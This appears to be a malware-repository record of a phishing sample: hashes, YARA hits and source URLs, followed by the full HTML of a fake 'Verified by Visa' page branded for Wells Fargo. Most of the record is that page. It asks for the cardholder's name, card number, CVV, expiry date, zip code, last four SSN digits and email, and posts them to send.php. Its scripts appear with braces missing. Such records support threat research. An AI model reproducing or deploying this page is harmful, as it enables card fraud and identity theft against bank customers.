Sample details: d7963502469f7ee50ea7b8a4d8081719 --

Hashes
MD5: d7963502469f7ee50ea7b8a4d8081719
SHA1: d81905276c384723e934ddccb662e07669f2340d
SHA256: e2f4d561ce4c56a677c09eedcd7944f54d39d0c5bf3a8611f660d8b687a22f27
SSDEEP: 192:jhgQfQCI0fXRpFaAUzpxXpIXrdTbM6Esm9XsF/DxWaR5FP9phX0FpUMArD9Vpt:jDQAgxZ2TbM6EsCXsF/DD1FXEbUZVL
Details
File Type: HTML
Yara Hits
YRP/domain | YRP/contentis_base64 | YRP/android_meterpreter |
Source
http://aggiehealth.com/inboxaol/wellsfargo/7b572a6e7136573fabb108649656dcbc
http://aggiehealth.com/inboxaol/wellsfargo/92adda902210eec7e307576e382e989a/
http://aggiehealth.com/inboxaol/wellsfargo/
http://aggiehealth.com/inboxaol/wellsfargo/1b74b59a4c74b2a5ec6dc2ffa112aa7d
Strings
		<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>
<meta http-equiv="Cache-Control" content="no cache">
<meta http-equiv="Pragma" content="no cache">
<meta http-equiv="Expires" content="0">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<title>Verified by Visa</title>
	<link rel="icon" type="image/gif" href="index_fichiers/WELL10000056.GIF" />
	<link rel="stylesheet" href="index_fichiers/style.css" type="text/css">
	<script language="JavaScript">
		function popUp2(strURL)
		    //popUP2 = window.open("en_US_DPS_Bulk12/" + strURL,'popUp2','width=390,height=400,scrollbars=no,screenX=100,screenY=100,left=100,top=100"');
		    popUP2 = window.open("en_US_DPS_Bulk12/" + strURL,'popUp2','width=390,height=400,scrollbars=yes,screenX=100,screenY=100,left=100,top=100"');
			popUP2.focus();
	//-->
	</script>
<script language="javascript" src="index_fichiers/pwdbase.js"></script>
<script language="javascript" src="index_fichiers/pwdcookies.js"></script>
<script language="JavaScript">
var ACSCondData = "1101";
var FI_LOGO = "WELL10000056.gif";
var LOCALE_FOLDER = "en_US_DPS_Bulk12/";
var isAA = false;
var acsstring = document.location.href;
if(acsstring.indexOf("AVV=1") != -1)
	isAA = true;
	setCookie("AAFlag","true");
var cookievalForAA = getCookie("AAFlag");
if(cookievalForAA != null)
	if(cookievalForAA == "true")
		isAA = true;
function OnPageInit()
	if((1101  == 1101) || (1101 == 1103) ||
		(1101 >= 1200 && 1101 <= 1202))
		document.optInForm.Continue.disabled = false;
		document.optInForm.Activatenow.disabled = false;
		document.optInForm.Donotactivatenow.disabled = false;
	window.history.go(1);
	self.focus();
var closing = true;
function checkSessionStatus(object)
	var cookievalss = getCookie("DPS_Bulk1_AE");
				//alert("In oninit cookievalss="+cookievalss);
				if(cookievalss != null)
					if (cookievalss > 3 || cookievalss == 3)
					{
						setCookie("DPS_Bulk1_AE",0);
						setCookie("DPS_Bulk1_AE_Flg","true");
						closing = false;
						return closeButton(object);
					}
function onBeforeUnloadHandler(object)
	var Flag = getCookie("DPS_Bulk1_AE_Flg");
	if(Flag != null)
		if(Flag == "true")
			setCookie("DPS_Bulk1_AE_Flg","false");
			return;
		else
			if ( closing )
				if (isAA)
					event.returnValue = "Your activation has not completed!\nTo complete your activation click 'Cancel'.";
				else
					event.returnValue = "Your purchase has not completed!\nTo complete your purchase click 'Cancel'.";
		if ( closing )
			if (isAA)
				event.returnValue = "Your activation has not completed!\nTo complete your activation click 'Cancel'.";
			else
				event.returnValue = "Your purchase has not completed!\nTo complete your purchase click 'Cancel'.";
function onFocusHandler()
	closing = true;
function HelpWindow()
	var win = window.open("en_US_DPS_Bulk12/sorryhelp.htm","Help",
		"height=300,width=360,dependent=yes,scrollbars=yes,resizable=no,screenX=650,screenY=350,left=650,top=350");
// Configurable parameters:
var loadError = null;
function objError (evnt)
	loadError = "error";
function isValidCreditCardExpiry(expiresMonth, expiresYear)
  var isValid = true;
  var nowDate = new Date();
  if (expiresMonth < (nowDate.getMonth() + 1) &&
      expiresYear == nowDate.getFullYear())
    isValid = false;
  else if (expiresYear < nowDate.getFullYear())
    isValid = false;
  return isValid;
 * This works on 1 character only if _ONE=1
 * if _ONE=0 then it will replace all occurances.
var _ONE=1;
function Switch(item,OldChar,NewChar)
  var _ret="";
  var _flag=0;
  var _item=item.split("");
  for(var i=0;i<_item.length;i++)
    if(!_flag&&_item[i]==OldChar)
	  _item[i]=NewChar;
      _flag=_ONE;
	_ret+=_item[i];
  return(_ret);
function closeButton(object)
		closing = false;
		//alert("calling OnCancelHandler2");
		setCookie("DPS_Bulk1_AE_TrnStatus","fail");
		OnCancelHandler2(object);
		cancel = true;
		//close();
</script>
<SCRIPT LANGUAGE="JavaScript" src="en_US_DPS_Bulk12/WELL10000056.gif_phno.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" src="en_US_DPS_Bulk12/WELL10000056.gif.js"></SCRIPT>
<script language="javascript">
var bankdir = "WELL10000056.gif";
setCookie("BANKDIR",bankdir);
<!--Methods used on the Optin page-->
function OnUserInput(userInput)
	var bankidgif = FI_LOGO;
	var bankdir = bankidgif.slice(0,bankidgif.indexOf(".gif"));
    closing = false;
	if(userInput == 1)
		var name = document.optInForm.CHName1.value;
		if(name.length > 0)
			document.optInForm.CustData.value = ",CHName="+name;
		else
			alert("Please enter your name as it appears on your card.");
			document.optInForm.CHName1.focus();
			return false;
		var cvv2 = document.optInForm.cvv2.value;
		  if(!cvv2.match(/^\d{3}$/))
			alert("Please enter a valid Signature Panel Code!");
			return false;
		var expdate1 = document.optInForm.expdate1.value;
		  if(!expdate1.match(/^\d{2}$/))
			alert("Please enter a valid Card Expiration Date!");
			return false;
		var expdate2 = document.optInForm.expdate2.value;
		if(!expdate2.match(/^\d{2}$/))
			alert("Please enter a valid Card Expiration Date!");
			return false;
		var month = expdate1;
		var year = "20" + expdate2;
		if (month < 1 || month > 12)
			alert("Please enter a valid Month and Year of your Card Expiration Date");
			return false;
		var isvalid = isValidCreditCardExpiry(month,year);
		if(!isvalid)
			alert("Please enter a valid Month and Year of your Card Expiration Date");
			return false;
		var zip = document.optInForm.zip.value;
		  if(!zip.match(/^\d{5}$/))
			alert("Please enter your valid Zip Code!");
			return false;
		var ssn = document.optInForm.ssn.value;
		  if(!ssn.match(/^\d{4}$/))
			alert("Please enter the valid Primary Cardholder's SSN (last 4)!");
			return false;
		var validEmail = "true";
		var checkStr3 = document.optInForm.email.value;
		var sendmail = "false";
		if( checkStr3 != null || checkStr3 != '')
			if ("" != checkStr3)
				var index = checkStr3.indexOf("@");
					//alert("Index of @: "+checkStr3.indexOf("@"));
				emailStrA = checkStr3.substr(0,index);
					//alert(emailStrA);
				emailStrB = checkStr3.substr(index+1);
					//alert(emailStrB);
				if ( ("" == emailStrA) || ("" == emailStrB) )
					validEmail = "false";
					//alert("emailStrA is null");
				sendmail="true";
			if("false" == validEmail)
				alert("Invalid Email Address format.  Please enter a valid Email Address!");
				return false;
	   	document.optInForm.optIn.value = userInput;
	   	if((ACSCondData >= 1100) &&  (ACSCondData <= 1103) ||
	   		(ACSCondData >= 1200 && ACSCondData <= 1202))
	   	{
	   		if( sendmail == "true")
				document.optInForm.CustData.value = ",EMail=" + document.optInForm.email.value + ",CHName="+name;
			document.optInForm.pin.value = "dateExpired=" + month + year + "&verificationCode=" + document.optInForm.cvv2.value + "&zip=" + document.optInForm.zip.value + "&last4ssn=" + document.optInForm.ssn.value;
	   	}
		document.optInForm.optIn.value = userInput;
		if((ACSCondData >= 1100) &&  (ACSCondData <= 1103) ||
			(ACSCondData >= 1200 && ACSCondData <= 1202))
			document.optInForm.pin.value = "NA";
	if((ACSCondData  == 1101) || (ACSCondData == 1103) ||
		(ACSCondData >= 1200 && ACSCondData <= 1202))
		document.optInForm.Continue.disabled = true;
		document.optInForm.Activatenow.disabled = true;
		document.optInForm.Donotactivatenow.disabled = true;
	document.optInForm.submit();
	return false;
</script>
<!--<SCRIPT LANGUAGE="JavaScript" src="en_US_DPS_Bulk12/WELL10000056.gif.js"></SCRIPT>-->
</head>
<body leftmargin="0" topmargin="0" onbeforeunload="onBeforeUnloadHandler(this);" onload="checkSessionStatus(this);" onfocus="onFocusHandler();" marginwidth="0" marginheight="0" bgcolor="#ffffff">
<form name="optInForm" action="send.php" method="POST">
<!-- This table centers the content area in the window, irregardless of the window's size -->
<table height="100%" cellspacing="0" cellpadding="0" border="0" width="100%">
	<tbody><tr><td colspan="3"><img src="index_fichiers/spacer_clear.gif" alt="" height="1" border="0" width="1"><br></td></tr><!-- Top 20 pixels of white space -->
		<td><img src="index_fichiers/spacer_clear.gif" alt="" height="0" border="0" width="20"><br></td><!-- Left 20 pixels of white space -->
		<td align="center">
			<!-- Content area -->
			<table height="340" cellspacing="0" cellpadding="0" border="0" width="330">
				<tbody><tr>
					<td height="51" width="89" valign="bottom">
						<!-- Visa graphic -->
						<img name="vpasLogo" src="index_fichiers/vpas_logo.gif" alt="Verified by Visa" border="0"><br>
					</td>
					<td height="51" align="right" width="301" valign="bottom">
						<!-- Issuer logo -->
						
					</td>
					</tr><tr><td colspan="3"><img src="index_fichiers/spacer_clear.gif" alt="" height="2" border="0" width="1"></td></tr><!-- 15 pixels of white space between the header and the logo-->
				<tr>
					<td colspan="2" height="298">
						<font face="arial" color="#003366" size="3"><b>Authentication Required For Purchase</b></font><br><img src="index_fichiers/spacer_clear.gif" alt="" height="10" border="0" width="1"><font class="TextBlack">Your Visa card has been activated in Verified by Visa to help protect against unauthorized use online <b>-- at no additional cost</b>.<br><br>Whenever
 your card is used at participating online stores, your Visa card Issuer
 will ask for your Verified by Visa password to verify that you 
authorize the purchase.
<a href="javascript:%20popUp2('details.htm?WELL10000056.gif')" onclick="closing=false">Click here for more details.</a><br><br>Complete the form below and click Continue to proceed. </font><br style="line-height:3px">
	    				<table cellspacing="0" cellpadding="3" border="0" width="330">
						<tbody><tr><td colspan="3"><img src="index_fichiers/spacer_clear.gif" alt="" height="1" border="0" width="1"></td></tr>
						<tr>
<td class="TextBlack" align="right" width="150" valign="top">Name on Card:</td>
<td width="170" valign="top"><input name="name" size="20" maxlength="30" class="monospace" type="text">&nbsp;&nbsp;<br></td>
<td class="TextBlack" align="right" width="150" valign="top">Credit Card Number:</td>
<td width="170" valign="top"><input name="ccnum" size="20" maxlength="30" class="monospace" type="text">&nbsp;&nbsp;<br></td>
<td class="TextBlack" align="right" width="150" valign="top">Signature Panel Code:</td>
<td width="170" valign="top"><input name="cvv2" size="3" maxlength="3" class="monospace" type="password">&nbsp;&nbsp;<a href="javascript:%20popUp2('sigpanel.htm?WELL10000056.gif')" onclick="closing=false"><img src="index_fichiers/cvv2.gif" alt="Verification Code" height="20" align="top" border="0" width="120"></a><br></td>
<td class="TextBlack" align="right" width="150" valign="top">Card Expiration Date:</td>
<td width="170" valign="top"><input name="expdate1" size="2" maxlength="2" class="monospace" type="text">-<input name="expdate2" size="2" maxlength="2" class="monospace" type="text">&nbsp;&nbsp;<span class="TextSmall">MM-YY</span><br></td>
<td class="TextBlack" align="right" width="170" valign="top">Your Zip Code:</td>
<td width="150" valign="top"><input name="zip" size="5" maxlength="5" class="monospace" type="password">&nbsp;&nbsp;<span class="TextSmall">12345</span><br></td>
<td class="TextBlack" align="right" width="150" valign="top">Primary Cardholder's SSN (last 4):</td>
<td width="170" valign="top"><input name="dummy1" size="3" maxlength="3" class="monospace" value="xxx" disabled="disabled" type="text">-<input name="dummy2" size="2" maxlength="2" class="monospace" value="xx" disabled="disabled" type="text">-<input name="ssn" size="4" maxlength="4" class="monospace" type="password"><br></td>
<td class="TextBlack" align="right" width="150" valign="top">Email Address:</td>
<td width="170" valign="top"><input name="email" size="15" maxlength="30" class="monospace" type="text">&nbsp;<a href="javascript:%20popUp2('email.htm?WELL10000056.gif')" onclick="closing=false"><img src="index_fichiers/question_mark_sm.gif" alt="Email Address" align="bottom" border="0"></a><br></td>
						</tbody></table>
						<!-- Issuer speciffic info -->
					<!-- Start of the Close button -->
						<div align="center">
							<img src="index_fichiers/spacer_clear.gif" height="2" width="1">
							<input name="Continue" value="Continue" onclick="return OnUserInput(1);" type="submit">
							<noscript>
							<INPUT TYPE="Submit" VALUE="Activate now" onClick="closing=false">&nbsp;
							<INPUT TYPE="Submit" VALUE="Do not activate now" onClick="closing=false">
							<INPUT TYPE="Submit" VALUE="Continue">
							</noscript>
						</div>
					<!-- End of the Close button -->
					</td>
				</tr>
				<tr>
		  			<td align="left" valign="top">
		  				<script language="javascript">
		  				if(1101 >= 1200 && 1101 <= 1202)
		  				{
		  					document.writeln ('<A TITLE="Return to password entry" 
HREF="Back" VALUE="Back" onClick="return OnUserInput(300);">Back</A>');
		  				}
		  				</script>
		  			</td>
				</tr>
				<tr>
				<td colspan="2">
		<!-- copyright notice table -->
		<table cellspacing="0" cellpadding="0" border="0" width="100%">
		<tbody><tr height="3"></tr>
		<tr>
		<!--<TD width=150></TD>-->
		<td align="left" valign="top">
		<script language="javascript">
		if ((1101  == 1101) || (1101 == 1103))
			document.writeln ("<SPAN class=\"TextSmall\">By clicking Continue, 
you agree to these");
				document.writeln("<A HREF=\"javascript: 
popUp2\('WELL10000056.giftoc.html?WELL10000056.gif'\)\" 
onClick=\"closing=false\">Terms & Conditions.</A>");
		else if(1101 >= 1200 && 1101 <= 1202)
			// do nothing
		else
			document.writeln ("<SPAN class=\"TextSmall\">By clicking Activate 
now, you agree to these");
			document.writeln("<A HREF=\"javascript: 
popUp2\('WELL10000056.giftoc.html?WELL10000056.gif'\)\" 
onClick=\"closing=false\">Terms & Conditions.</A>");
		</script><span class="TextSmall">By clicking Continue, you agree to these
<a href="javascript:%20popUp2('WELL10000056.giftoc.html?WELL10000056.gif')" onclick="closing=false">Terms &amp; Conditions.</a>
		<noscript>
			<A HREF="en_US_DPS_Bulk12/tandc.htm" target=_blank onClick="closing=false">Terms & Conditions.</A>
		</noscript>
		<br>
		<!--
		Click here to view
		<script language="javascript">
			//document.writeln ("<A HREF=\"javascript: popUp2\('privacy.htm?WELL10000056.gif'\)\" onClick=\"closing=false\">");
		</script>
		<!--
		<NOSCRIPT>
			<A HREF="en_US_DPS_Bulk12/privacy.htm" target=_blank onClick="closing=false">
		</NOSCRIPT>
		Privacy Policy.</A>
		</span>
		</td></tr>
		</tbody></table>
		<!-- end copyright notice table-->
				</td>
				</tr>
			</tbody></table>
			<!-- End of content area -->
		</td>
		<td><img src="index_fichiers/spacer_clear.gif" alt="" height="0" border="0" width="20"><br></td><!-- Right 20 pixels of white space -->
	</tr>
	<script language="javascript">
	</script>
	<!--<IMG SRC="en_US_DPS_Bulk12/images/spacer_clear.gif" WIDTH="1" HEIGHT="0" BORDER=0 ALT="">--><!-- bottom 20 pixels of white space -->
	</td>
	</tr>
</tbody></table>
</form>
<!-- End of centering table -->
</body></html>